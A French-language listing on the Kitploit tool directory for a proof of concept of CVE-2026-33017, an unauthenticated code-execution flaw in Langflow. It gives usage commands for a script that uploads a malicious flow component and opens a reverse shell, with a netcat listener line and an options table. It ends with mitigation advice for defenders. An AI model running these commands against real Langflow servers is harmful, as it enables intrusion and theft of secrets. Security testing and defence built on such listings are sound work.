Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-33017-Langflop — CVE-2026-33017 Langflow RCE PoC | Kitploit
Outils/GitHubGitHub/tatosec/cve-2026-33017-langflop
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubtatosec/cve-2026-33017-langflop

CVE-2026-33017-Langflop

CVE-2026-33017 Langflow RCE PoC

Voir le dépôt
il y a 15 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-33017 Langflow ("Langflop") PoC RCE non authentifiée

PoC de la faille d'exécution de code non authentifiée build_public_tmp dans Langflow. Il téléverse un composant malveillant dans un flux public, déclenche un build et récupère un reverse shell.

Réservé aux tests de sécurité autorisés. Utilisez-le uniquement contre des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation explicite de test.

Prérequis

  • Python 3
  • requests (pip install requests)

Utilisation

Lancez l'écouteur intégré et déclenchez l'exploit en une seule fois :

root@kitploit:~
python3 poc.py \
  --url https://target:7860 \
  --flow-id <public-flow-uuid> \
  --lhost <your-ip> \
  --lport 4444 \
  --listen

Lorsque le shell se connecte, il tente automatiquement de passer à un shell entièrement interactif.

Si vous préférez utiliser votre propre écouteur (par exemple nc -lvnp 4444), retirez --listen :

root@kitploit:~
python3 poc.py --url https://target:7860 --flow-id <uuid> --lhost <your-ip> --lport 4444

Options

Informations

CVE-2026-33017 est une RCE non authentifiée dans le point de terminaison POST /api/v1/build_public_tmp/{flow_id}/flow de Langflow, qui exécute le Python fourni par l'attaquant à partir des définitions de nœuds de flux sans sandboxing. Pour en savoir plus, consultez les ressources ci-dessous :

  • Article de Sysdig Threat Research : CVE-2026-33017 : comment les attaquants ont compromis les pipelines IA de Langflow en 20 heures
  • NVD : CVE-2026-33017

Recommandations (défenseurs)

Mesures d'atténuation issues de l'article de Sysdig Threat Research :

  • Mettez à jour Langflow immédiatement. Si une version corrigée n'est pas encore disponible, restreignez l'accès réseau au point de terminaison /api/v1/build_public_tmp ou désactivez entièrement la construction de flux publics.
  • Auditez les variables d'environnement et les secrets sur toute instance Langflow exposée publiquement. Renouvelez les clés API, les mots de passe de base de données et les identifiants cloud par précaution.
  • Surveillez les connexions sortantes vers des ports inhabituels ou des services de rappel connus (oastify.com, interact.sh, dnslog.cn), qui indiquent une exploitation active et une exfiltration de données.
  • Restreignez l'accès réseau aux instances Langflow à l'aide de règles de pare-feu ou d'un proxy inverse avec authentification. !!Langflow ne doit pas être directement exposé à Internet sans couche d'authentification !!
  • Inventoriez les outils IA/ML de votre environnement. Les plateformes comme Langflow, n8n et d'autres outils d'automatisation de flux de travail sont de plus en plus ciblées car elles fonctionnent souvent avec un accès API étendu et sont déployées en dehors des processus standard de revue de sécurité.

Avertissement

Cet outil est fourni à des fins de recherche et de tests d'intrusion autorisés. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages.

Télécharger l’outil
FlagDescription
--urlURL du serveur Langflow cible (obligatoire)
--flow-idUUID du flux public partagé (obligatoire)
--lhostIP de rappel du reverse shell (obligatoire)
--lportPort de rappel du reverse shell (obligatoire)
--listenLance l'écouteur intégré
--timeoutDélai d'expiration des requêtes HTTP en secondes (par défaut 30)
-k, --insecureDésactive la vérification du certificat TLS (certificats auto-signés / expirés)
--no-upgradeIgnore la mise à niveau TTY automatique, utilise un shell en ligne basique